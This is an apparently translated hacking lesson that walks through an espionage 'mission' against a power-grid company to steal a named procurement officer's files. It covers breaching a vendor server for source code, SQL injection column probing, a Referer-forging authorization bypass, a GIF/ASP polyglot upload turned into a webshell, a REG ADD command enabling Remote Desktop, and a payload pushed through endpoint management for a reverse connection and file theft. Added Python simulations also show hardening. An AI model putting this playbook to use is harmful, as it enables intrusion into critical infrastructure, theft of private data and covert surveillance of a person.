# Lesson 4: ASP Code Audit -- Practical Project 2

## 0x00 Task background

We need the details of one of Zhou XX's procurement projects for this year. What is known so far: this person works at xxx Power Grid and is the procurement officer responsible for the Fengman Dam. The overall approach:

* Find the development company -> obtain the source code -> audit it for issues -> get a shell -> take the server ->
* get the domain controller (or the endpoint management system) -> reach the personal workstation -> download the task file.

We learned that the power grid company's grid-related websites were built by a particular vendor. We located that vendor's public marketing website, obtained access to its server, and downloaded the source code templates from there.

## 0x01 Source code audit

Globally there are 2 main files: Function.asp and Startup.asp.

### 1. Function.asp

Back-end validation items:

* Origin (Referer) validation:

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrC4yScfRoNAxBrw%2Ff3d00f2e404aed2ace94202fad9196e1.jpg?generation=1551060435416699\&alt=media)

* Injection validation (the target server sits behind a WAF, so this route was abandoned):

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrC6TZYM8MamOSYj%2F69876bba47950df97d93d92afc6db16e.jpg?generation=1551060429575273\&alt=media)

* Error handling:

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrC8GM_I9RpYBgt3%2F84612708e4d4f301fd655d48dc05267a.jpg?generation=1551060438264197\&alt=media)

* XSS character handling:

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCA_wY6P8ZVHr-h%2F2e3dd4d6f449ed860b790f4022b17291.jpg?generation=1551060443535631\&alt=media)

* Handling of direct requests for file names under admin/:

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCCXRrnDNrbp8bG%2F99f0ee3d3f7cd1ff3965502aff91bf1e.jpg?generation=1551060454065243\&alt=media)

* Directory generation: handles IIS 6 as well as the IIS 7 PHP variant:

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCEewY1Iez76Mel%2F0a28fcfc4ba6e48eb857cc6b18e374e5.jpg?generation=1551060444163747\&alt=media)

### 2. Startup.asp

* Configuration file: when code execution is not possible, check whether the database can be backed up to a location from which it can be downloaded:

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCGJ3J_SW9u79eg%2F47c48653bf1053dce5cee81320444f63.jpg?generation=1551060450110179\&alt=media)

* News display: head.asp is included globally:

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCIZAhQ-PSW5KMb%2F2275d60bafee51dd0adf82a42b9d079b.jpg?generation=1551060455142204\&alt=media)

### 3. check\_si.asp

check\_si.asp exists mainly to prevent SQL injection.

* GET injection:

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCKvSdcG43oA92V%2F398190858612948b7bee70a83bd145c2.jpg?generation=1551060426560324\&alt=media)

* POST injection: the newer version adds filtering for POST injection as well.

During testing the server was sluggish, and the number of columns in the injected SELECT was unknown, so the column count was determined locally by binary search over `ORDER BY n`, as follows:

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCM-dDeQ9tKlYiq%2F6c8bfb4c6de07bb3a93296288a15bbb0.jpg?generation=1551060459289206\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCOFkPOf5g2HosA%2F664d42e0571762dcbe9c25f6b43928b1.jpg?generation=1551060435526413\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCQzs5NgqzmDcWs%2Ff6c06ab3aefa6fffd987c9c7c90ed3e0.jpg?generation=1551060442787587\&alt=media)
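The binary search that the screenshots above carry out by hand, written out as an added Python example (this is not code from the original write-up). The oracle is a constructed stand-in that behaves like a query over a table with a fixed column count; in a live test it would be a function that sends `1 ORDER BY n--` into the injection point and reports whether the page rendered normally. The doubling step followed by bisection matters on a sluggish server: it costs roughly 2·log2(n) requests instead of n.

```python
"""Find the column count of an injectable SELECT with ORDER BY n, using
exponential growth then binary search. Added example; the oracle below is a
constructed simulation of the target, not a real HTTP client."""

from typing import Callable


def make_constructed_oracle(true_columns: int) -> Callable[[int], bool]:
    """Simulate 'SELECT ... ORDER BY n': success (True) only if n <= true_columns.
    Probes are recorded on the function object so the request count can be seen."""
    calls = []

    def oracle(n: int) -> bool:
        calls.append(n)
        if n < 1:
            raise ValueError("ORDER BY index must be >= 1")
        return n <= true_columns  # an out-of-range index raises a DB error on a real target

    oracle.calls = calls
    return oracle


def order_by_payload(n: int) -> str:
    """Shape of the payload that each probe would inject (shown for reference only)."""
    return f"1 ORDER BY {n}--"


def find_column_count(oracle: Callable[[int], bool], upper: int = 1024) -> int:
    """Return the largest n for which ORDER BY n succeeds.

    Phase 1: double hi until ORDER BY hi fails (lo stays the last known-good value).
    Phase 2: bisect between lo (good) and hi (bad) until they are adjacent.
    """
    if not oracle(1):
        raise RuntimeError("ORDER BY 1 already fails: wrong injection point or oracle")
    lo, hi = 1, 2
    while True:
        if hi > upper:
            raise RuntimeError(f"more than {upper} columns? check the oracle")
        if not oracle(hi):
            break
        lo, hi = hi, hi * 2
    # invariant from here on: oracle(lo) is True, oracle(hi) is False
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if oracle(mid):
            lo = mid
        else:
            hi = mid
    return lo


if __name__ == "__main__":
    o = make_constructed_oracle(7)
    print("columns:", find_column_count(o), "probes sent:", o.calls)
```

Each probe is one request, so on a target that takes seconds per response the difference between six probes and a linear walk of eight or more is what makes the test practical.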

### 4. database.asp

There is a database.asp file under the admin directory:

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCSn2XDLvb3BwaQ%2F8271f2240cf178ee4a6fba221aeaedc2.jpg?generation=1551060428618349\&alt=media)

## 0x02 Target testing

### 1. Authorization bypass

Based on the findings above: forge the Referer, craft the parameters, and disable JavaScript in the browser. The result is an authorization bypass of the admin functions.

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCU7USgU-Ui0vze%2F5d66957a8586118f1ca10d23a0815a85.jpg?generation=1551060448938186\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCWqGeyHns1_YGo%2Fbff69d4a2c2a89ef8703ec99fd8fc8e3.jpg?generation=1551060426992753\&alt=media)
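Why the combination of a forged Referer and disabled JavaScript is enough, shown as an added Python example covering both the Function.asp "origin validation" item in 0x01 and the bypass above. This is not the audited site's code: the two page renderers are reconstructions of the weak pattern (a Referer gate plus a client-side redirect for users who are not logged in, with the admin body still emitted after the redirect tag) and of a proper server-side check. The host name, session layout and page body are assumed.

```python
"""Referer gate + client-side redirect versus a server-side session check.
Added example; the site code, host and session fields are assumed."""

import re
from urllib.parse import urlparse

SITE_HOST = "www.example.com"   # assumed host of the audited site
ADMIN_PREFIX = "/admin/"
ADMIN_BODY = "<table id='orders'><tr><td>...</td></tr></table>"  # stand-in admin page
JS_REDIRECT = "<script>location.href='/admin/login.asp';</script>"


def referer_is_internal(headers):
    """The 'origin validation' pattern: trust the request if Referer points at our
    own admin area. Referer is chosen by the client, so it only stops accidental
    cross-site requests, never a deliberate one."""
    ref = urlparse(headers.get("Referer", ""))
    return ref.netloc == SITE_HOST and ref.path.startswith(ADMIN_PREFIX)


def render_admin_weak(headers, session):
    """Weak: Referer gate, then a JavaScript redirect for users who are not logged
    in, after which the page body is emitted anyway."""
    if not referer_is_internal(headers):
        return "403 Forbidden"
    out = "" if session.get("admin_logged_in") else JS_REDIRECT
    return out + ADMIN_BODY


def render_admin_strong(headers, session):
    """Hardened: authorisation comes from server-side session state only, and the
    handler returns before any admin content is generated. Referer plays no part."""
    if not session.get("admin_logged_in"):
        return "302 /admin/login.asp"
    return ADMIN_BODY


def client_sees(response, javascript_enabled):
    """Model the browser: with JS on, a script redirect navigates away (modelled
    as an empty page); with JS off, the script tag is inert and the rest renders."""
    if javascript_enabled and "<script>" in response:
        return ""
    return re.sub(r"<script>.*?</script>", "", response)


# Constructed attacker request: forged Referer, no session at all, JS disabled.
FORGED_HEADERS = {"Referer": f"http://{SITE_HOST}/admin/index.asp"}
NO_SESSION = {}


def attacker_view(renderer):
    """What the attacker receives from a given renderer."""
    return client_sees(renderer(FORGED_HEADERS, NO_SESSION), javascript_enabled=False)


if __name__ == "__main__":
    print("weak  :", attacker_view(render_admin_weak))
    print("strong:", attacker_view(render_admin_strong))
```

The point the weak renderer makes is that the redirect is advisory: the server has already decided to send the admin content, and only the browser's cooperation hides it. Any check that must hold has to end the request on the server side.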

### 2. Upload

With the authorization bypass in hand, look at upload.asp next: it allows anonymous upload of image files. Then, again through the bypass, use the database backup function to copy the uploaded file out as a webshell.

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCYCh9RdNlHNno_%2F35aca0797d0299bb8c104d8be4bb3d6c.jpg?generation=1551060448245988\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrC_lxkDFHNw5CCb%2Fcc1c8766b6439d3e3c011ae8250066ad.jpg?generation=1551060447280811\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCbQoi1Jl-HUYdo%2F18f0b435a0ce1ccbb750a46e4b8df563.jpg?generation=1551060437250471\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCdA8bUffb6oy3u%2Ff1e074099cd43a5aa7057f57762b768f.jpg?generation=1551060427718634\&alt=media)
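How the image upload and the database.asp backup (0x01, item 4) combine into a webshell, and the checks that would break the chain, as an added Python example. This is not the site's code: upload.asp and database.asp are modelled as an in-memory class, the directories and parameter names are assumed (the screenshots do not show them), and the "shell" is a harmless marker tag so the polyglot mechanism can be shown without shipping a working shell.

```python
"""Image-magic upload check plus an unrestricted 'backup database' copy, and the
hardened versions of both. Added example; directories, names and the in-memory
file store are constructed stand-ins for the real site."""

import posixpath

DATA_DIR = "/data"              # assumed: the only tree the backup feature may touch
UPLOAD_DIR = "/upload/images"   # assumed upload location
SCRIPT_EXTS = {".asp", ".asa", ".cer", ".cdx"}   # extensions classic IIS hands to asp.dll
IMAGE_MAGIC = (b"GIF89a", b"GIF87a", b"\xff\xd8\xff", b"\x89PNG")
ASP_MARKER = b'<% Response.Write("polyglot") %>'  # harmless stand-in for shell code


class FakeSite:
    """In-memory model of upload.asp and the database.asp backup; no real disk I/O."""

    def __init__(self, hardened=False):
        self.hardened = hardened
        self.files = {"/data/site.mdb": b"constructed mdb bytes"}
        self.counter = 0

    def upload(self, filename, data):
        """Accept only image extensions whose first bytes look like an image.
        A GIF header followed by ASP passes this check in both modes."""
        ext = posixpath.splitext(filename)[1].lower()
        if ext not in {".jpg", ".gif", ".png"} or not data.startswith(IMAGE_MAGIC):
            return None
        if self.hardened:
            # Server-chosen base name; the client controls only the (whitelisted)
            # extension. The directory must also have IIS script execution disabled.
            self.counter += 1
            filename = f"{self.counter}{ext}"
        path = posixpath.join(UPLOAD_DIR, filename)
        self.files[path] = data
        return path

    def backup(self, src, dst):
        """Weak: copy any readable path to any destination the caller names.
        Hardened: both paths are normalised (so '..' cannot escape) and must be
        .mdb files under DATA_DIR, so the copy can never produce a script file."""
        if self.hardened:
            src, dst = posixpath.normpath(src), posixpath.normpath(dst)
            for p in (src, dst):
                if not p.startswith(DATA_DIR + "/") or posixpath.splitext(p)[1].lower() != ".mdb":
                    return False
        if src not in self.files:
            return False
        self.files[dst] = self.files[src]
        return True


def webshell_present(site):
    """True if any file with a script-mapped extension contains ASP tags."""
    return any(posixpath.splitext(p)[1].lower() in SCRIPT_EXTS and b"<%" in d
               for p, d in site.files.items())


def attack(site):
    """Upload a GIF/ASP polyglot, then abuse backup to copy it to an .asp path."""
    polyglot = b"GIF89a" + b"\x01\x00\x01\x00" + ASP_MARKER
    stored = site.upload("avatar.gif", polyglot)
    if stored is None:
        return False
    site.backup(stored, "/shell.asp")  # attacker-chosen destination
    return webshell_present(site)


if __name__ == "__main__":
    print("weak site shelled:", attack(FakeSite(hardened=False)))
    print("hardened site shelled:", attack(FakeSite(hardened=True)))
```

Two independent fixes each break the chain: the backup feature refusing any source or destination outside its data directory or with a non-.mdb extension, and the upload directory being served without script execution. Doing only the upload-side rename is not enough, because the backup copy is what changes the extension.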

### 3. Get Shell

Webshell obtained:

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCf0fqPHD4n_E5g%2F17ab0b85f64e92e48eaeeb32ef0f83aa.jpg?generation=1551060426300778\&alt=media)

### 4. Enable 3389

Remote Desktop was not enabled on the target. Enable it by clearing fDenyTSConnections (this needs an administrative context; if the Windows Firewall is on, its Remote Desktop rule must also be allowed before port 3389 is reachable). The original command wrote the key as `Terminal" "Server`, a quoting trick cmd.exe accepts; the plain quoted form is:

```
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
```

### 5. Get Admin

Through this server we reached the MSSQL database, and from there obtained administrative access to the endpoint management system.

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCheB75ZsW5pkOd%2Fae7a57c36b08aeb2176945f9e2072e6d.jpg?generation=1551060440760201\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCjZrWTAL6pG2Ae%2Fccc30aaffee18324e722073588b55c9b.jpg?generation=1551060443910431\&alt=media)

### 6. Locate the target

List the machines that are online and look for the target person.

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrClKZCfuZb741yd%2F7e76f878e0182df67f910a01ccfa315c.jpg?generation=1551060446588018\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCnbDaAb8kI9_Vc%2F9906ffaba02adcbfef821163286b9104.jpg?generation=1551060426574245\&alt=media)

### 7. Push payload

Push the payload through the endpoint management system and receive the reverse connection.

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCpoS4f0LsLnxLp%2F09d81485119e132856f82757b8418f69.jpg?generation=1551060446508087\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCrXotLYdiWMucr%2F9938674149690d748853a0adf86e8fe3.jpg?generation=1551060453455182\&alt=media)

### 8. Target confirmation

Confirm that this is the target person (the procurement officer): desktop screenshot.

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCtDgHF5VVtKSNH%2F545e99d1852fd486c825fc29598b0a0d.jpg?generation=1551060456223488\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCvelWfrg9nv0pM%2F04deeea27d64d51d2a0826d5d66b488d.jpg?generation=1551060436739550\&alt=media)

### 9. Download

As the task requires, retrieve one of this person's xls files.

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCx0calZ8B2a_Zg%2Ff67aea48578dce29a104af040d4cbe74.jpg?generation=1551060442840218\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrCzchPC527oNQCo%2Fec0b56268a8689d959c65ca976e3cd90.jpg?generation=1551060425083329\&alt=media)

### 10. Mission Completed

Mission completed.

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJwrD0PgxppHn8lfoM%2Fa90bcbaa1e1bb96809cfb8afc4a4dc22.jpg?generation=1551060426573236\&alt=media)

\--By Micropoor
